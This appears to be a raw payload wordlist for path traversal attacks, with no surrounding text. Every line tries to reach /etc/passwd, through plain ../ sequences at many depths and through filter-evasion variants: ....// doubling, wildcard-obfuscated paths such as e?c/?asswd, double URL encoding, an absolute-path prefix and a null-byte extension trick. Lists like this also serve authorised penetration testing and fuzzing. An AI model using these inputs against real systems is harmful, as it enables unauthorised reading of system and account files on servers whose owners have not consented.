/etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
../../../e?c/?asswd
../../../../e?c/?asswd
../../../../../e?c/?asswd
../../../../../../e?c/?asswd
../../../../../../../e?c/?asswd
../../../../../../../../e?c/?asswd
../../../../../../../../../e?c/?asswd
../../../../../../../../../../e?c/?asswd
../../../e*c/*asswd
../../../../e*c/*asswd
../../../../../e*c/*asswd
../../../../../../e*c/*asswd
../../../../../../../e*c/*asswd
../../../../../../../../e*c/*asswd
../../../../../../../../../e*c/*asswd
../../../../../../../../../../e*c/*asswd
../../../??c/?asswd
../../../../??c/?asswd
../../../../../??c/?asswd
../../../../../../??c/?asswd
../../../../../../../??c/?asswd
../../../../../../../../??c/?asswd
../../../../../../../../../??c/?asswd
../../../../../../../../../../??c/?asswd
../../../??c/?assw?
../../../../??c/?assw?
../../../../../??c/?assw?
../../../../../../??c/?assw?
../../../../../../../??c/?assw?
../../../../../../../../??c/?assw?
../../../../../../../../../??c/?assw?
../../../../../../../../../../??c/?assw?
....//....//....//e?c/?asswd
....//....//....//....//e?c/?asswd
....//....//....//....//....//e?c/?asswd
....//....//....//....//....//....//e?c/?asswd
....//....//....//....//....//....//....//e?c/?asswd
....//....//....//....//....//....//....//....//e?c/?asswd
....//....//....//....//....//....//....//....//....//e?c/?asswd
....//....//....//....//....//....//....//....//....//....//e?c/?asswd
....//....//....//e*c/*asswd
....//....//....//....//e*c/*asswd
....//....//....//....//....//e*c/*asswd
....//....//....//....//....//....//e*c/*asswd
....//....//....//....//....//....//....//e*c/*asswd
....//....//....//....//....//....//....//....//e*c/*asswd
....//....//....//....//....//....//....//....//....//e*c/*asswd
....//....//....//....//....//....//....//....//....//....//e*c/*asswd
....//....//....//??c/?asswd
....//....//....//....//??c/?asswd
....//....//....//....//....//??c/?asswd
....//....//....//....//....//....//??c/?asswd
....//....//....//....//....//....//....//??c/?asswd
....//....//....//....//....//....//....//....//??c/?asswd
....//....//....//....//....//....//....//....//....//??c/?asswd
....//....//....//....//....//....//....//....//....//....//??c/?asswd
....//....//....//??c/?assw?
....//....//....//....//??c/?assw?
....//....//....//....//....//??c/?assw?
....//....//....//....//....//....//??c/?assw?
....//....//....//....//....//....//....//??c/?assw?
....//....//....//....//....//....//....//....//??c/?assw?
....//....//....//....//....//....//....//....//....//??c/?assw?
....//....//....//....//....//....//....//....//....//....//??c/?assw?
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
